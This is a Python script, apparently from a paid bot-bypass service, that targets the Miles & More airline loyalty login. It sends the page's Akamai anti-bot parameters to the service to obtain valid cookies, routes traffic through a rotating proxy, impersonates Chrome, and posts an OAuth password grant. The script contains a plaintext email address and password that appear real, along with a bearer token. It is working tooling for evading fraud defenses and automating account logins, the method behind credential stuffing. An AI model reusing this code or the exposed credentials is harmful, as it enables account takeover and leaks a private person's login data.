# -*- coding: utf-8 -*-
# Auto-generated by RiskByPass Task Panel
# Deps: pip install requests
import requests, time, json, random

BASE_URL = "https://riskbypass.com"  # API base URL
TOKEN    = "your token"    # Access token (sent as x-api-key)
TIMEOUT  = 60                         # Timeout (seconds)
random_port = random.randint(10000, 20000)
PROXY = f'http://xxxxxx__cr.us:xxxxxxxx@gw.psbproxy.io:{random_port}'

def run_task(payload):
    session = requests.Session()
    headers = {"Content-Type": "application/json", "x-api-key": TOKEN}

    print("Submitting task…")

    try:
        resp = session.post(f"{BASE_URL}/task/submit", headers=headers, json=payload, timeout=30)
        resp.raise_for_status()
        data = resp.json()
    except Exception as e:
        print("Submit request error:", repr(e))
        return

    if not data.get("ok"):
        print("Submit failed:", data)
        return

    task_id = data.get("task_id")
    if not task_id:
        print("No task_id in response:", data)
        return

    print("Submitted, task_id =", task_id)
    
    start_time = time.time()

    while True:
        if time.time() - start_time > TIMEOUT:
            print("Timeout (seconds)")
            return
        try:
            r = session.get(f"{BASE_URL}/task/result/{task_id}", headers={"Cache-Control":"no-cache"}, timeout=30)
            r.raise_for_status()
            j = r.json()
        except Exception as e:
            print("Polling error:", repr(e))
            time.sleep(1)
            continue

        st = j.get("status", "UNKNOWN")
        print("status:", st)

        if st in ("RUNNING", "QUEUED"):
            time.sleep(1)
            continue

        if st == "SUCCESS":
            print("SUCCESS, result:", json.dumps(j.get("result"), ensure_ascii=False, indent=4))
            return j.get("result")
        elif st == "FAILED":
            print("FAILED:", j.get("error", j))
            return
        elif st == "NOT_FOUND":
            print("NOT_FOUND: maybe invalid or recycled task_id")
            return
        else:
            print("UNKNOWN:", j)
            return

if __name__ == '__main__':
    # Task JSON payload
    payload = {
        "task_type": "akamai",
        "proxy": PROXY,
        "target_url": "https://account.miles-and-more.com/web/row/ru/login.html?client_id=agGBZmuTGwFXWzVDg8ckGKGBytemE1nS&target_state=AUTHENTICATED&target_url=https://consent.msp.miles-and-more.com/&response_type=code&redirect_uri=https://www.miles-and-more.com&scope=AUTHENTICATED%20IDENTIFIED%20urn%3Amilesandmore%3Atech%3Abackground%3Av1%3Aactive&principal_type=SERVICE_CARD_NUMBER&reduced_state=NONE",
        "akamai_js_url": "https://account.miles-and-more.com/KlGM1qL4x/C/2/pr-BykXaZPdv5gs4/1wcE4J9fY1Xukmh9aw/FXwEbR59TQ4/FXNpLHx/0OQ4C",
        "page_fp": "42455e5a4e495c505f47465c4547534f46535f4349595f594e495c505f44445d4247534043595f4349595f594e485c505f4545504b47534b43585f4349585f5b4e485c505f40415e4b47504841555f4349595f594e495c515f4142504747504145565f4349595f5b4e495c505f45475a4247544c444d4348424543475255414d4540405f5f5c5a415c5148435e595f5b4e485c5740464145425a56495c5148",
        "abck_length_list": []
    }
    cookies = run_task(payload).get('cookies_dict')
    headers = {
        'accept': 'application/json, text/plain, */*',
        'accept-language': 'en,zh-CN;q=0.9,zh;q=0.8',
        'cache-control': 'no-cache',
        'content-type': 'application/x-www-form-urlencoded',
        'origin': 'https://account.miles-and-more.com',
        'pragma': 'no-cache',
        'priority': 'u=1, i',
        'referer': 'https://account.miles-and-more.com/',
        'sec-ch-ua': '"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Windows"',
        'sec-fetch-dest': 'empty',
        'sec-fetch-mode': 'cors',
        'sec-fetch-site': 'same-site',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36',
        'x-api-key': 'agGBZmuTGwFXWzVDg8ckGKGBytemE1nS',
        'x-authorization': 'Bearer U2FsdGVkX19sJHgCYn51QQXVQibRvnkCski7bAENypfUXWF8aW4ZpZiq8qeiqcjmjbNxOBKiYiGFPg3I64uvrYIHo/r6+25RO01dKGP1DGsN/z/knWYkzOhmKMsXYZr/',
        'x-scope': 'AUTHENTICATED urn:milesandmore:oauth:multifactorauthentication urn:milesandmore:oauth:multifactorauthentication:totp IDENTIFIED',
    }

    data = 'grant_type=password&identified=true&password=Cario123!&username=juergenfecker%40gmx.de'
    from primp import Client
    client = Client(impersonate='chrome_133', impersonate_os='windows', proxy=PROXY)
    response = client.post('https://api.miles-and-more.com/oauth2/token', cookies=cookies, headers=headers, content=data.encode())
    print(response.status_code)
    print(response.text)
